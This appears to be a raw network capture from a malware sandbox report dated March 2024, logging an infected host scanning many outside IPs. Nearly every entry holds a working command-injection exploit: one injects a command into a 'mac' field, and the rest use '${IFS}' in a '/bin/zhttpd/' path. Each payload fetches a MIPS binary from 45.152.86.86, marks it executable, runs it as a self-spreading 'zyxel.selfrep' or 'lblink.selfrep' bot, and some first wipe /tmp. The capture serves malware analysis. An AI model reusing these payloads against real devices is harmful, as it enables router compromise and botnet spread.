                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:28.326203108 CEST141INHTTP/1.1 400 Content-Length missing
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 20 6d 69 73 73 69 6e 67 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><body>Content-Length missing</body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8157192.168.2.234238662.45.145.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:28.689825058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8158192.168.2.2345840125.156.235.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:28.689878941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8159192.168.2.2335882204.188.195.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:28.689925909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8160192.168.2.2348430144.192.6.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:28.690071106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8161192.168.2.234615068.220.114.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702178001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8162192.168.2.2351654124.241.77.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702230930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8163192.168.2.2353012139.198.171.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702263117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8164192.168.2.2341596154.70.136.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702301979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8165192.168.2.2333322136.146.182.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702375889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8166192.168.2.234708035.181.92.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702425957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8167192.168.2.2336356153.249.168.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702467918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8168192.168.2.2348066154.0.186.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702502966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8169192.168.2.2341888167.96.47.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702538013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8170192.168.2.233506482.231.9.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702599049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8171192.168.2.2346212183.250.158.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702634096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8172192.168.2.2338132159.241.159.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702676058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8173192.168.2.234122693.185.24.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702725887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8174192.168.2.234449680.183.153.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702775002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8175192.168.2.2356610158.127.60.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702841043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8176192.168.2.2342054140.90.108.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702883959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8177192.168.2.2339858103.49.82.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702931881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8178192.168.2.2358880171.12.232.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.702986002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8179192.168.2.2356444133.238.142.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703031063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8180192.168.2.2340406219.140.241.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703083038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8181192.168.2.234761292.94.33.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703119993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8182192.168.2.23445921.180.35.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703161955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8183192.168.2.2337724191.85.23.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703224897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8184192.168.2.2346304223.101.169.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703282118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8185192.168.2.235129018.214.135.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703320026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8186192.168.2.2333826160.224.229.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703377008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8187192.168.2.2350650222.40.208.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703403950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8188192.168.2.2345812221.137.13.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703450918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8189192.168.2.2338754164.193.196.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703526974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8190192.168.2.2345390143.24.162.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703555107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8191192.168.2.236023670.226.13.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703615904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8192192.168.2.233978631.52.153.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703654051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8193192.168.2.235048040.11.17.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703707933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8194192.168.2.2347096113.231.8.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703762054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8195192.168.2.235874261.106.3.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703794956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8196192.168.2.234447669.171.134.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703824043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8197192.168.2.234376688.10.54.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703866959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8198192.168.2.2334752145.252.237.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703901052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8199192.168.2.235765299.194.2.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703948975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8200192.168.2.2348902130.89.56.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.703991890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8201192.168.2.233920817.222.196.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704025030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8202192.168.2.235834872.207.174.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704088926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8203192.168.2.233911284.131.247.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704125881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8204192.168.2.2360178209.159.84.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704170942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8205192.168.2.2332884117.57.198.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704206944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8206192.168.2.2357348206.144.210.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704265118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8207192.168.2.2347794207.33.213.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704307079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8208192.168.2.2333904187.109.158.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704355955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8209192.168.2.234297867.58.151.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704401970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8210192.168.2.235386634.53.79.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704441071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8211192.168.2.2349510110.111.34.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704473019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8212192.168.2.2335624161.233.92.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704524994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8213192.168.2.2339994218.242.49.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704556942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8214192.168.2.234451499.2.97.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704623938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8215192.168.2.2353890106.189.186.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704648972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8216192.168.2.2352918139.149.84.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704693079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8217192.168.2.234005084.22.72.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704749107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8218192.168.2.2334032154.98.0.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704786062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8219192.168.2.2339692130.42.205.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704849958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8220192.168.2.235986246.22.49.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704879045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8221192.168.2.235749243.149.91.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.704916000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8222192.168.2.234171062.102.60.62443
                                        TimestampBytes transferredDirectionData
